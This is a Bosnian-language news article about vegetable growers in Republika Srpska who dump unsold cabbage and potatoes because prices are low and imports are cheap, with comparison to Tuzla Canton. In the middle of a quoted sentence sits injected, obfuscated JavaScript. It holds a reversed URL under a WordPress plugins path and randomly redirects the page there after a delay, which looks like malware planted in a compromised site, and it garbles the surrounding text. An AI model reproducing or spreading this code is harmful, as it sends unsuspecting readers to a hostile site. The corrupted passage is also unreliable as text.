Povrtari u RS u problemima: Kupus i krompir završe na smeću

Domaći rani kupus tek je stigao, a on sav, po svemu sudeći, opet neće naći put do kupaca, jer proizvođačima u RS već sad i po cijeni od 0,15 KM za kilogram prijeti scenario od prethodnih godina kada su velike količine uništene ili zaorane.

Proizvođači povrća žale se i na niske cijene krompira, koji se na pijacama trenutno prodaje za 0,50 KM po kilogramu, a strahuju da će ga morati davati i po 0,40 KM. “I lani sam od 15 duluma kupusa samo tri prodao. Prijatelj je skoro bio na pijaci tri dana, pola ranog kupusa je prodao, a pola vratio. Što se tiče luka, cijena je slaba, zimac je jako loše cijene i ne može se prodati iako košta 0,40. Krompir nam pristiže za sedmicu dana, potražnja je loša, a cijena niska”, kazao je Branko Mastalo, predsjednik Udruženja povrtara u RS i proizvođač iz Lijevča. Prema njegovim riječima, kada domaći krompir pristigne, cijena će mu još pasti, a što se tiče lanjskog, velike količine su na deponijama ili u trapovima.

“Ja sam odvozio na deponiju oko 70 tona krompira, s tim da ni jesenas nisam vadio sve količine, jedan hektar sam ostavio na njivi”, kazao je Mastalo. Prema njegovim riječima, barem prvi krompir trebalo bi da košta u početku 0,70 KM, kako bi imali zarade, ali neće ga moći prodati po toj cijeni, jer je sada u prodaji 0,50 KM, onaj koji se dovozi iz Hercegovine. “Kada se poslije 20. jtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una bude masovno vadio naš krompir zbog zasada kupusa na to mjesto, biće ogromna ponuda i vjerujemo da ga nećemo moći prodati”, kazao je Mastalo. Kako ističe, cijenu još drže plasteničke paprike, ali to su mala branja. Pored krompira i kupusa, proizvođači su lani velike gubitke imali na lubenicama. Stojan Marinković, predsjednik Saveza udruženja poljoprivrednih proizvođača RS, kaže da već dugi niz godina imaju problem sa plasmanom proizvoda po nepovoljnim cijenama i vještački stvorenog viška, zbog čega svoje proizvode moraju uništavati.

“Istovremeno uvozimo sve što možemo izvesti, od paradajza iz Albanije i Makedonije do krompira iz Egipta, mesa iz Brazila. Suočeni smo sa nekontrolisanim prekomjernim uvozom i nedostatkom mjera zaštite domaće proizvodnje”, kazao je Marinković. Ističe da se bacaju velike količine kupusa i lanjskog krompira, čija je cijena 0,20 KM, ali se ni on ne može prodati. Bolja situacija je u Tuzlanskom kantonu, gdje su zadovoljni cijenom krompira koji se kreće od 0,80 KM do jednu KM. “Krompir se kod nas prilično isplati sijati, jer se na toj parceli kasnije sadi i jesenji kupus, tako skida dvije žetve. Kupusa zasad nema kod nas, koliko sam upoznat. Važno je da možemo prodati ono što posijemo”, kazao je Enes Hasanović, sekretar Udruženja bh. poljoprivrednika iz Sektora Tuzlanskog kantona.

Nezavisne

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login